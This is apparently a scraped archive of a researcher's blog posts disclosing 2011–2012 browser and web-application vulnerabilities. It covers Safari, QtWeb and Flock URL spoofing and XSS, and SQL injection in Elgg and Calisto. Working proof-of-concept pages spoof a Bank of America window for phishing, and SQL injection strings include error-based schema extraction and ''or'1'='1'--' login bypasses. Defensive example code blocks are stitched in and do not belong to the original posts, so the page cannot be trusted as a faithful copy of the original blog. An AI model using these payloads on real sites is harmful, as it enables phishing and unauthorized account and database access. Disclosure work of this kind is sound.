Safari has serious issues with protocol handlers; over a long time I have reported
four or five vulnerabilities in different protocols and handlers.
I reported a telnet issue in Safari for Windows, <strike>which Apple patched in silence.</strike><br />
<br />
Today I downloaded and tested Safari for Windows 5.1.5 only to check whether the vulnerability I reported in 03/2012 is patched..
see => http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html
Safari for Windows 5.1.5 has the same vulnerability ummm....<br />
<br />
############<br />
Description<br />
############<br />
<br />
Safari set the bar higher for web browsers. It introduced
sophisticated design elements that made browsing a joy.
Easy to use, Safari stayed out of your way and let you
effortlessly navigate from site to site.
Safari for Windows ignores which protocol handler we use: it does not
check whether the protocol is registered, or simply does not check the handler at all...
In the case discussed here, a pseudo URL spoof is possible. Let's
look at some examples to understand the nature of this vulnerability.<br />
<br />
Case: the "about:" protocol handler.
Type "about:blank" in the address bar and it shows the about:blank page;
this is what we expect and this template is OK.
Type "about:something" in the address bar and the title and the URL both show the same (about:something).
Type "about:http://www.bankofamerica.com" and the title shows the same...<br />
<br />
Now the best part: write a title that simulates the title of the original page and
write some content into this window (about:http://www.bankofamerica.com).
The URL bar shows it, but in reality we are on an about:blank page...<br />
<br />
############<br />
PoC's<br />
############<br />
<br />
Create a function that opens a new window and writes the location...<br />
<br />
var wx;
function invokePoC() {
wx = open("about:http://www.bankofamerica.com/login","newwin");
setInterval("doit()",1);
}<br />
<br />
And create a function that writes into the resulting window.<br />
<br />
function doit() {
wx.document.open();
wx.document.write("<title>spoof title</title><body><h1><b>Hello !! i'm a Spoofed Site !!!</b></h1></body>");
}<br />
<br />
With this a remote attacker can carry out spoofing or phishing attacks, but since Safari has issues with handlers,
the best attack is to drop the about: handler and simulate bankofamerica directly:
we write "www:" as if it were a handler inside an http: URL (http://www:bankofamerica.com/login) to get a nice-looking URL :)<br />
<br />
##########################<br />
Safari for Windows URL Spoof<br />
##########################<br />
<br />
This PoC simulates the Bank of America URL and content.
The image is embedded via the data: scheme.<br />
<br />
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><br />
<html><br />
<head><br />
<title>Safari for windows 5.1.5 and prior URL spoof window.open() test case.</title><br />
<script type="text/javascript"><br />
var wx;<br />
function invokePoC() {<br />
wx = open("http://www:bankofamerica.com/login","newwin");<br />
setInterval("doit()",1);<br />
}<br />
function doit() {<br />
wx.document.open();<br />
wx.document.write("<title>Bank of America | Home | Personal</title><body><img src='data:image/gif;base64,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'/><h1><b>Hello !! i'm a Spoofed Site !!!</b></h1></body>");<br />
}<br />
</script><br />
</head><br />
<body onload="invokePoC()"><br />
<h1>Safari for Windows 5.1.5 and prior URL pseudo-spoof window.open() test case.</h1><br />
<noscript><p>This test case requires JavaScript to run.</p></noscript><br />
<p>First click this link ==> <a href="http://www.bankofamerica.com/login" onClick="location.reload();" target="_blank">invoke PoC</a></p><br />
<p>Then look at the result window: the address bar shows the URL, and if you type<br />
any URL into the address bar, the browser cannot navigate to it. This issue can be<br />
used to spoof sites or for phishing attacks. Vulnerable: Safari for Windows 5.1.5 and<br />
prior versions; Safari for iOS is also vulnerable.</p><br />
</body><br />
</html><br />
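As an added example (not part of the original PoC), the following JavaScript shows what a strict URL parser makes of the two spoof targets used above, and what an address bar should display for each. It uses the WHATWG URL parser that Node and current browsers implement; the allowlist of handled schemes and known about: pages is an assumption for the example. Safari 5.1.5 accepted both strings and showed them verbatim; a conforming parser rejects one outright and gives the other no host at all. Run it with `node`.

```javascript
// Added example; not from the advisory. Classifies a navigation target the
// way a browser should before opening a window an attacker can draw into.
function classifyNavigationTarget(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch (e) {
    // "http://www:bankofamerica.com/login" fails here: after the host "www",
    // ":" starts a port, and "bankofamerica.com" is not a valid port number.
    return { ok: false, raw, reason: 'unparseable URL' };
  }
  // Non-special schemes such as about: carry an opaque path and no host, so
  // the host-looking text after "about:" is path data, never an origin.
  const isSpecial = ['http:', 'https:', 'ftp:', 'file:', 'ws:', 'wss:'].includes(url.protocol);
  return {
    ok: true,
    raw,
    scheme: url.protocol,
    host: url.host,          // '' for about:... URLs
    path: url.pathname,
    // The security-relevant identity the address bar should show.
    display: isSpecial && url.host ? `${url.protocol}//${url.host}` : url.protocol,
  };
}

// A navigation may only proceed for schemes the browser actually handles
// (assumed allowlist). Unparseable or unknown targets must not open a window,
// because the opener can then fill it with document.write() under a bogus URL.
const KNOWN_ABOUT_PAGES = ['about:blank'];  // hypothetical allowlist

function shouldOpen(raw, handledSchemes = ['http:', 'https:', 'about:']) {
  const r = classifyNavigationTarget(raw);
  if (!r.ok) return false;
  if (r.scheme === 'about:') return KNOWN_ABOUT_PAGES.includes(raw);
  return handledSchemes.includes(r.scheme) && r.host !== '';
}
```

`about:http://www.bankofamerica.com/login` parses as scheme `about:` with an empty host and the bank's URL as opaque path, so the only honest thing to display is `about:`; `http://www:bankofamerica.com/login` does not parse at all and should never have produced a window.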
####################### €Nd ######################<br />
<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what makes the mind move....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-5323521479395191532012-03-23T03:11:00.002-07:002012-04-03T15:32:48.308-07:00Safari for windows and IOS URL weakness<pre>#####################################
Safari for Windows and iOS URL Spoof
Vendor URL: http://www.apple.com
Advisory: http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html
Vendor notify: YES PoC available: YES
#####################################
#############
History
#############
Yesterday I read a news item about the Safari for iOS
URL spoof vulnerability at http://iclarified.com/entry/comments.php?enid=20858
I want to clarify that I reported this vulnerability on 12/03/2011 to Apple
Product Security through MSVR. (I have the e-mails that prove it.)
So Apple did not patch it and this vuln is one year old.
I also reported an automatic telnet execution in Safari for Windows...
and <strike>they patched it in silence</strike> ... no credits, no info...
This is Apple's response about the telnet execution:
" Issue 1: We do not see any security implications with allowing telnet connections.
There is an existing enhancement request for OS X to provide a warning dialog."
Yes, but not on Windows, and if you make apps for Windows you can't say it doesn't work on OS X. It works in Safari for Windows prior to 5.1.4.
Issue 2: URL Spoof
Some time ago I found an RCE in IE 6, 7 and 8, see MS011-57;
it also affects the QtWeb browser and Safari for Windows.
I reported it to Apple and sat quiet, waiting for Apple to patch.
So what happened? After a year of reporting, the vuln continues working and other
researchers have published it ( http://majorsecurity.net ),
but I would like to clarify that I reported it to Apple one year ago !!!
Response from Apple:
"Issue 2: The outside third party you are coordinating with already sent this issue to us on January 10, 2011. It does not appear possible to spoof arbitrary URLs in the address bar (i.e. while the title may say "Bank of America" in the proof-of-concept, you can't spoof the address bar to read https://bankofamerica.com) Given that the most serious impact of this issue is that you can prevent the user from using the address bar in the newly created tab, we do not have a timetable to resolve this issue."
Look at his PoC / exploit and look at my PoC code:
His code => http://majorsecurity.net/html5/ios51-demo.html
My code => http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html
This is similar to the code I reported to Apple.
Bad words for Apple on security !!!!!!!!!!! and bad work with security researchers :/
################
Sample codes
################
############ BOF Safari.html #################
<html><title>Safari unauth telnet execution by lostmon</title>
<script type="text/javascript" language="javascript">
function redirect() {
location.replace("telnet:192.168.1.1");
}
</script>
<body onLoad="redirect();">
</body>
</html>
############### EOF ################
2- URL Spoof or about:blank spoof
This issue can be used to spoof URL locations or to show fake content
without any URL in the address bar
- open the PoC and click on Invoke PoC and look at the address bar: it
does not show any URL.... (safari2.html)
- open the PoC and click on invokePoC (safari3.html) and look at the address bar:
it shows "about:blank" but it isn't at about:blank,
and look at the page title :) This can be used to spoof content.
############## BOF safari2.html #################
<html>
<head>
<title>About:blank Url spoofing using document.open() testcase</title>
<script type="text/javascript"><!--
var wx;
function invokePoC() {
wx = open("","newwin");
setInterval("doit()",1);
}
function doit() {
wx.document.open();
wx.document.write('OWNED OWNED OWNED');
}
// -->
</script>
</head>
<body>
<h1>About:blank Url spoofing using document.open() testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p><a href="javascript:invokePoC();">invoke PoC</a></p>
</body>
</html>
################# EOF ################################
#################### BOF safari3.html ###################
<html>
<head>
<title>About:blank Url spoofing using document.open() testcase</title>
<script type="text/javascript"><!--
var wx;
function invokePoC() {
wx = open("about:blank","newwin");
setInterval("doit()",1);
}
function doit() {
wx.document.open();
wx.document.write('<html><title>Bank Of America</title>OWNED OWNED OWNED<br></html>');
}
// -->
</script>
</head>
<body>
<h1>About:blank Url spoofing using document.open() testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p><a href="javascript:invokePoC();">invoke PoC</a></p>
</body>
</html>
##################### EOF ##############################
I would like to thank MSVR for their concern about this issue and for talking about it with Apple. MSVR is a very good program and they do A VERY GOOD WORK on security!!!!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
</pre>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-54194734087003927472011-10-03T03:55:00.001-07:002011-10-03T03:57:09.093-07:00QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks#################################################<br />
QTWeb Internet Browser URL weakness lets remote attackers carry out spoofing or phishing attacks<br />
Vendor URL: http://www.qtweb.net/<br />
Vendor bugtrack => http://code.google.com/p/qtweb/issues/detail?id=151<br />
Advisory: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html<br />
Vendor notify: YES exploit available: YES<br />
##################################################<br />
<br />
###################<br />
Description By vendor<br />
###################<br />
<div style="text-align: justify;">
QtWeb Internet Browser - lightweight, secure and portable browser having unique user interface and privacy features. QtWeb is an open source project based on Nokia's Qt framework and Apple's WebKit rendering engine (the same as being used in Apple Safari and Google Chrome).</div>
<br />
######################<br />
Vulnerability Description<br />
######################<br />
<br />
<div style="text-align: left;">
In the normal case, when you navigate to a site the browser shows the real URL. But it has a weakness: an attacker can make it show an empty URL. This weakness can be used for phishing or spoofing attacks, because you may think you are at Bank of America, for example, while the browser shows nothing in the URL bar :) </div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzJn5s8fe9D715KjGQuOrrEdEPsjapG2JR8PHbKSZf4Ihu-_tJ4OSZC5-xJpMNIvbqHABPlSjUi-zB0qcAo_IFI7iuswYqtJVliyAcdm8rbo7FxIYBoMYlN-FDWnuEenMIxfCN/s1600/qt1.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzJn5s8fe9D715KjGQuOrrEdEPsjapG2JR8PHbKSZf4Ihu-_tJ4OSZC5-xJpMNIvbqHABPlSjUi-zB0qcAo_IFI7iuswYqtJVliyAcdm8rbo7FxIYBoMYlN-FDWnuEenMIxfCN/s400/qt1.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b><span style="color: black;">Without any URL</span></b></td></tr>
</tbody></table>
<div style="text-align: justify;">
Also an attacker can compose a popup with these attributes, which can be used for spoofing or phishing attacks too: toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0 </div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_8Om_RjwwoqQ4bXd6xfs1ljAbREjGikVyj9hq6mz0BPhTBrJJjvBH0G_h3CqmgRW3_E8ZPPkm5UtQo_lSVfzTa5fV3TKGNzF9qylLxa4jI5PtcP0e-7okYPYVMPLMK-7qNYF7/s1600/qt2.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_8Om_RjwwoqQ4bXd6xfs1ljAbREjGikVyj9hq6mz0BPhTBrJJjvBH0G_h3CqmgRW3_E8ZPPkm5UtQo_lSVfzTa5fV3TKGNzF9qylLxa4jI5PtcP0e-7okYPYVMPLMK-7qNYF7/s400/qt2.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Popup without toolbars and address bar</b></td></tr>
</tbody></table>
################<br />
Versions affected<br />
################<br />
<br />
QTweb 3.7.2 Vulnerable<br />
QTweb 3.7.3 (build 087) Vulnerable<br />
and possibly prior versions.<br />
<br />
######################<br />
Proof Of Concept<br />
######################<br />
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><br />
<html><br />
<head><br />
<title>QTweb 3.7.2 and 3.7.3 (build 087) document.open() URL weakness Spoof testcase by Lostmon</title><br />
<script type="text/javascript"><br />
var wx;<br />
function invokePoC() {<br />
wx = open(":#:","newwin");<br />
setInterval("doit()",1);<br />
}<br />
function doit() {<br />
wx.document.open();<br />
wx.document.write("<title>Bank of America | Home | Personal</title><img src='data:image/gif;base64,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'/>");<br />
}<br />
</script><br />
</head><br />
<body><br />
<h1>QTweb 3.7.2 and 3.7.3 (build 087) document.open() URL weakness Spoof testcase by Lostmon</h1><br />
<noscript><p>this testcase requires JavaScript to run.</p></noscript><br />
<p>First Click in this link ==> <a href=":#:" onClick="invokePoC();" target="_blank">invoke PoC</a></p><br />
<p>and look in the result window: the address bar doesn't show the URL, <br />
and if you write any URL in the address bar the browser does not navigate to it.<br />
This issue can be used to spoof sites or for phishing attacks.<br />
Safari 5.1 (7534.50)<br />
</body><br />
</html><br />
<br />
################<br />
Solution<br />
###############<br />
<br />
No solution at this time !!!<br />
<br />
###############<br />
Timeline<br />
###############<br />
<br />
Discovered :Mar 30, 2011<br />
Vendor Notify: Sep 28, 2011<br />
Vendor response: XXXXX<br />
Vendor Patch: XXXXXX<br />
Public Disclosure: Oct 03, 2011<br />
<br />
########################## €nd ########################<br />
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....
Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-81688359255955351022011-08-15T12:28:00.001-07:002011-08-15T12:30:42.809-07:00Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection##################################################<br />
Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection<br />
Vendor URL: http://www.elgg.org/<br />
Advisory: http://lostmon.blogspot.com/2011/08/elgg-18-beta2-and-prior-to-1711.html<br />
Vendor notify: YES exploit available: YES<br />
##################################################<br />
<br />
###################<br />
Description By vendor<br />
###################<br />
<br />
Elgg is an award-winning social networking engine, delivering<br />
the building blocks that enable businesses, schools, universities<br />
and associations to create their own fully-featured social networks<br />
and applications. Organizations with networks powered by Elgg<br />
include: Australian Government, British Government, Federal Canadian<br />
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,<br />
Johns Hopkins University and more (http://elgg.org/powering.php)<br />
<br />
<br />
######################<br />
Vulnerability Description<br />
######################<br />
<br />
Elgg contains a flaw that may allow an attacker to carry out an<br />
SQL injection attack. The issue is due to the script not properly<br />
sanitizing user-supplied input to the 'container_guid' and 'owner_guid'<br />
variables upon submission to 'mod/search/pages/search/index.php'.<br />
This may allow an attacker to inject or manipulate SQL queries<br />
in the backend database.<br />
<br />
################<br />
Versions affected<br />
################<br />
<br />
Elgg 1.8 beta2 vulnerable<br />
Elgg 1.7.10 and prior versions vulnerable<br />
Elgg 1.7.11 not vulnerable<br />
<br />
#################<br />
Technical details<br />
#################<br />
<br />
The injection type is integer and it can only be exploited via the<br />
MySQL error-based injection method; it works with<br />
'magic_quotes_gpc' set to 'on' or 'off'<br />
<br />
<br />
######################<br />
Proof Of Concept<br />
######################<br />
<br />
If you know what is error based injection... you know how to use it ;)<br />
<br />
URL => http://localhost/elgg/search/?q=someword&search_type=tags&container_guid=7826'<br />
<br />
Injections:<br />
<br />
and(select 1 from(select count(*),concat((select (select %column_name%) from<br />
`information_schema`.tables limit 0,1),floor(rand(0)*2))x from<br />
`information_schema`.tables<br />
group by x)a) and 1=1<br />
<br />
Count(table_name) of information_schema.tables where<br />
table_schema=0x74657374 is 75<br />
<br />
Count(column_name) of information_schema.columns where<br />
table_schema=0x74657374 and table_name=0x62616E6C697374 is 4<br />
<br />
################<br />
Solution<br />
###############<br />
<br />
The vendor has released an updated version to solve this<br />
issue and others; see the changelog and update your Elgg<br />
installation to 1.7.11<br />
<br />
<br />
###############<br />
Timeline<br />
###############<br />
<br />
Discovered :July 30, 2011<br />
Vendor Notify:July 30, 2011<br />
Vendor response:July 30, 2011<br />
Vendor Patch: August 15, 2011<br />
Public Disclosure: August 15, 2011<br />
<br />
########################## €nd ########################<br />
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente.... Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-11612733854055088962011-08-11T14:09:00.004-07:002011-08-14T04:04:33.809-07:00Calisto light, light plus and full, Sql Injection And user or Admin bypass##################################################<br />
Calisto light, light plus and full, Sql Injection And user or Admin bypass<br />
Vendor URL: http://www.calistosoft.com.ar/<br />
Advisory: http://lostmon.blogspot.com/2011/08/calisto-light-light-plus-and-full-sql.html<br />
Vendor notify: YES exploit available: YES<br />
##################################################<br />
<br />
<br />
##########################<br />
Vulnerability Description<br />
##########################<br />
<br />
Calisto Light, Light Plus and Full contain a flaw that may<br />
allow an attacker to carry out an SQL injection attack. The<br />
issue is due to the script not properly sanitizing user-supplied<br />
input to the 'usuario' form field and 'txtEmail' parameter upon submission<br />
to 'login.aspx' and '/admin/loginAdmin.aspx'. This may allow an<br />
attacker to inject or manipulate SQL queries in the backend database.<br />
#################<br />
UPDATE 14/08/2011<br />
#################<br />
<br />
Detalle.aspx, Oferta.aspx, Categoria.aspx, contacto.aspx,<br />
marca.aspx, novedades.aspx, empresa.aspx, FAQ.aspx and Registracion.aspx<br />
are affected by this flaw too.<br />
<br />
################<br />
Versions affected<br />
################<br />
<br />
Calisto Light<br />
Calisto Light plus<br />
Calisto Full<br />
<br />
######################<br />
Proof Of Concept<br />
######################<br />
<br />
This issue can be used to bypass admin validation or user validation.<br />
<br />
1- If an attacker writes in the 'Usuario' box:<br />
<br />
someword'or'1'='1'<br />
and clicks the login button, when the application posts to 'login.aspx'<br />
it shows a nice SQL warning, but if you write:<br />
<br />
someword'or'1'='1'--<br />
<br />
it bypasses validation. If anyone knows a user's email, then they can<br />
log in as this user :)<br />
<br />
2- If an attacker writes in the 'usuario' box of the admin section:<br />
<br />
Admin'or'1'='1'--<br />
<br />
and clicks the login button, when the application posts to<br />
'/admin/loginAdmin.aspx' it bypasses admin validation. :)<br />
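<p>Both the Elgg search parameters ('container_guid', 'owner_guid') and the Calisto login fields ('usuario', 'txtEmail') described above reach a query without any check on the type or shape of the value. The following is an added example, not code from Lostmon, Elgg or Calistosoft: a small Node.js classifier that enforces a strict integer on the GUID parameters, flags the quote-OR-comparison and trailing-comment shape in the login fields, and runs over constructed Common Log Format lines as a log-review or WAF-style detection. The parameter-to-type mapping, the verdict names and the sample log lines are assumptions made for this example.</p>

```javascript
// Added example (not Lostmon's, Elgg's or Calistosoft's code): enforce the
// expected type/shape of the request parameters named in the two advisories
// and scan access-log lines for requests that violate it.

// Assumed parameter typing for the two applications discussed on this page.
const INTEGER_PARAMS = new Set(["container_guid", "owner_guid"]); // Elgg search
const STRING_PARAMS = new Set(["usuario", "txtEmail"]);            // Calisto login

// A canonical non-negative decimal integer: "7826" passes, "7826'" and "-1" do not.
function isStrictInteger(value) {
  return /^(0|[1-9][0-9]*)$/.test(value);
}

// Quote followed by OR/AND and a comparison (e.g. someword'or'1'='1'), and a
// trailing SQL comment opener (--, #, /*): the shape used in the Calisto steps.
const TAUTOLOGY = /['"]\s*(or|and)\s*['"]?[^'"]*['"]?\s*=/i;
const COMMENT_TAIL = /(--|#|\/\*)\s*$/;

// Decode one raw query-string value and return a verdict object.
function classifyParam(name, rawValue) {
  let value;
  try {
    value = decodeURIComponent(rawValue.replace(/\+/g, " "));
  } catch (e) {
    return { name, verdict: "malformed-encoding", value: rawValue };
  }
  if (INTEGER_PARAMS.has(name) && !isStrictInteger(value)) {
    return { name, verdict: "integer-param-non-numeric", value };
  }
  if (STRING_PARAMS.has(name) && (TAUTOLOGY.test(value) || COMMENT_TAIL.test(value))) {
    return { name, verdict: "tautology-or-comment", value };
  }
  return { name, verdict: "ok", value };
}

// Pull the request target out of a Common Log Format line and classify each
// query parameter. Returns null for lines without a recognisable request.
function scanLogLine(line) {
  const m = line.match(/"(?:GET|POST) ([^ "]+) HTTP\/[0-9.]+"/);
  if (!m) return null;
  const target = m[1];
  const qIdx = target.indexOf("?");
  if (qIdx < 0) return { path: target, findings: [] };
  const findings = [];
  for (const pair of target.slice(qIdx + 1).split("&")) {
    const eq = pair.indexOf("=");
    const name = eq < 0 ? pair : pair.slice(0, eq);
    const raw = eq < 0 ? "" : pair.slice(eq + 1);
    const result = classifyParam(name, raw);
    if (result.verdict !== "ok") findings.push(result);
  }
  return { path: target.slice(0, qIdx), findings };
}

// Only the lines that produced at least one finding.
function scanAll(lines) {
  return lines.map(scanLogLine).filter((r) => r && r.findings.length > 0);
}

// Constructed sample lines (not real traffic). Calisto's login fields are
// POSTed in reality; they are shown as query parameters here so the same
// scanner can exercise classifyParam on them.
const SAMPLE_LOG = [
  '10.0.0.5 - - [30/Jul/2011:10:01:02 +0200] "GET /elgg/search/?q=someword&search_type=tags&container_guid=7826 HTTP/1.1" 200 5120',
  '10.0.0.5 - - [30/Jul/2011:10:01:09 +0200] "GET /elgg/search/?q=someword&search_type=tags&container_guid=7826%27 HTTP/1.1" 500 812',
  '10.0.0.5 - - [30/Jul/2011:10:02:15 +0200] "GET /elgg/search/?q=x&owner_guid=-1 HTTP/1.1" 200 4096',
  '10.0.0.7 - - [07/Aug/2011:18:20:00 -0300] "GET /login.aspx?usuario=someword%27or%271%27%3D%271%27-- HTTP/1.1" 302 0',
];

console.log(JSON.stringify(scanAll(SAMPLE_LOG), null, 2));
```

<p>A plain apostrophe in a name ("O'Brien") is not flagged: the rule needs the quote to be followed by an OR/AND comparison or a comment opener, which is what distinguishes the bypass strings above from ordinary input. The application-side fix is the same check applied before the query is built (cast the GUIDs to integers, pass the login fields as bound parameters); logging the verdict gives the detection signal for the requests that were rejected.</p>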
<br />
<br />
################<br />
Solution<br />
###############<br />
<br />
No solution was available at this time.<br />
I have sent four emails to Calistosoft via their web form<br />
and to the info and support mails to get initial contact, but<br />
they haven't responded :(<br />
<br />
###############<br />
Timeline<br />
###############<br />
<br />
Discovered : 30-07-2011<br />
Vendor Notify: 7-08-2011<br />
Vendor response: no response.<br />
Workaround patch: no patch<br />
Vendor Patch: no patch<br />
Public Disclosure: 11-08-2011<br />
<br />
########################## €nd ########################<br />
<br />
Atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente.... Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-77284822533405503852011-08-09T11:55:00.003-07:002011-08-09T12:30:19.272-07:00Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability#############################################<br />
Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability<br />
Vendor URL: http://www.microsoft.com<br />
Advisory: http://lostmon.blogspot.com/2011/08/internet-explorer-6-7-and-8-windowopen.html<br />
Coordinated Disclosure: YES exploit available: Private<br />
CVE-2011-1257 and MS011-57<br />
#############################################<br />
<br />
Microsoft Internet Explorer 6, 7 and 8 are vulnerable to<br />
remote code execution due to a race condition in the window.open<br />
JavaScript method.<br />
<br />
A remote attacker can compose a web page with malicious code,<br />
and when a victim visits this malformed web document the attacker can<br />
exploit this situation.<br />
<br />
<br />
######################<br />
Solution<br />
######################<br />
<br />
Microsoft has issued a bulletin with technical details about this issue<br />
under the identifier [MS011-57]<br />
<br />
You can find more details at this link:<br />
http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx<br />
<br />
Also Microsoft has issued a patch to solve this vulnerability;<br />
see http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx<br />
to update your system.<br />
<br />
############<br />
Timeline<br />
############<br />
<br />
Discovered : January 13, 2011<br />
Vendor Notify: January 19, 2011<br />
Vendor Response: January 19, 2011<br />
Vendor Patch: August 9, 2011<br />
Public Disclosure: August 9, 2011<br />
<br />
################# €nd #########################<br />
<br />
Thnx to Michal Zalewski for his extraordinary mind<br />
and knowledge; people like him should have a virtual<br />
statue for the rest of time.<br />
<br />
Thnx to Jack, Gerardo, Nate and all of MSRC<br />
for their support on this issue.<br />
<br />
Thnx to Microsoft Vulnerability Research (MSVR)<br />
for their interest in this issue and for coordinating<br />
disclosure in the other affected browsers.<br />
<br />
Thnx to all who believe in me, including you Estrella :**<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-50290692770803760972011-03-11T14:35:00.001-08:002011-03-11T14:35:34.985-08:00Multiple vulnerabilities in Flock Browser 3.0.0.3989#########################################<br />
Multiple vulnerabilities in Flock Browser 3.0.0.3989<br />
Vendor URL: http://beta.flock.com/<br />
Vendor Advisories: http://www.flock.com/security/ <br />
Advisory: http://lostmon.blogspot.com/2011/03/multiple-vulnerabilities-in-flock.html<br />
Vendor notify: YES exploits available: YES<br />
######################################### <br />
<br />
Some stuff that I haven't published before, because I don't have time; I'm studying and I need time to read books and study.<br />
<br />
Flock is faster, simpler, and more friendly. Literally. It's the only sleek, modern web browser with the built-in ability to keep you up-to-date with your Facebook and Twitter friends. This browser version (3.0.0.3989) is based on an old Chromium project (5.0.375.75) and has multiple bugs imported from Chrome plus its own bugs :) <br />
I have contributed to securing the Flock browser; I have tested the version with the Google Chrome base. <br />
I have made a list of all the issues that I found, and the Flock team released some advisories about them some time later.<br />
<br />
###############<br />
TODO LIST / Bugs<br />
###############<br />
<ol><li> Inspector window attributes script injection, chrome bug 31590</li>
<li> XSS in the search engine in chrome://history/, chrome bug 13760 (not exploitable by remote attackers) (chrome://history/#q="><iframe src=javascript:alert(1)>&p=0) </li>
<li> XSS in the search box of the favorites page (chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title) (not exploitable by remote attackers) </li>
<li> XSS in the search engine extension when pasting in the URL (chrome-extension://flock_people/search.html) (persistent XSS) (not exploitable by remote attackers) </li>
<li> XSS in the social extension when trying to log in to Facebook, Twitter or YouTube (not exploitable by remote attackers) </li>
<li> XSS in the RSS viewer's search box, chrome-extension://flock_people/feed_viewer.html?http://path_to_rss (not exploitable by remote attackers) </li>
<li> XSS in the RSS viewer when rendering XML from a remote host: if an entry has HTML it is executed when viewing the news through the Flock RSS viewer (exploitable via remote sites) (see for example my feed => chrome-extension://flock_people/feed_viewer.html?http://lostmon.blogspot.com/atom.xml), and then if you type in the search box, for example " or <, it executes the XSS stored in the XML file again :) </li>
<li>window.open() Method Javascript Same-Origin Policy Violation, chrome bug 30660 </li>
<li>URL with a leading NULL byte can bypass cross origin protection, Chrome bug 37383</li>
</ol><br />
<br />
###########################<br />
Advisories from Flock developers<br />
###########################<br />
<b>FLOCK-SA-2010-04</b><br />
<br />
Title: window.open() Method Javascript Same-Origin Policy Violation (XSS)<br />
Impact: High<br />
Announced on: 2010-09-09<br />
Affected Products: Flock 3 versions prior to 3.0.0.4094<br />
CVEs (cve.mitre.org): CVE-2010-0661<br />
Details:<br />
WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp in WebKit before r52401, as used in Google Chrome before 4.0.249.78, allows remote attackers to bypass the Same Origin Policy via vectors involving the window.open method.<br />
<br />
Credit to Tokuji Akamine, Senior Consultant at Symantec Consulting Services (for Chromium) and Lostmon Lords (for Flock).<br />
References: https://bugs.webkit.org/show_bug.cgi?id=32647<br />
http://code.google.com/p/chromium/issues/detail?id=30660<br />
<br />
<b>FLOCK-SA-2010-03</b><br />
<br />
Title: javascript: url with a leading NULL byte can bypass cross origin protection (XSS)<br />
Impact: High<br />
Announced on: 2010-09-09<br />
Affected Products: Flock 3 versions prior to 3.0.0.4112<br />
CVEs (cve.mitre.org): CVE-2010-1236<br />
<br />
Details: <br />
A javascript: url with a leading NULL byte can bypass cross origin protection,<br />
which has unspecified impact and remote attack vectors.<br />
<br />
Credit to kuzzcc (for Chromium) and Lostmon Lords (for Flock).<br />
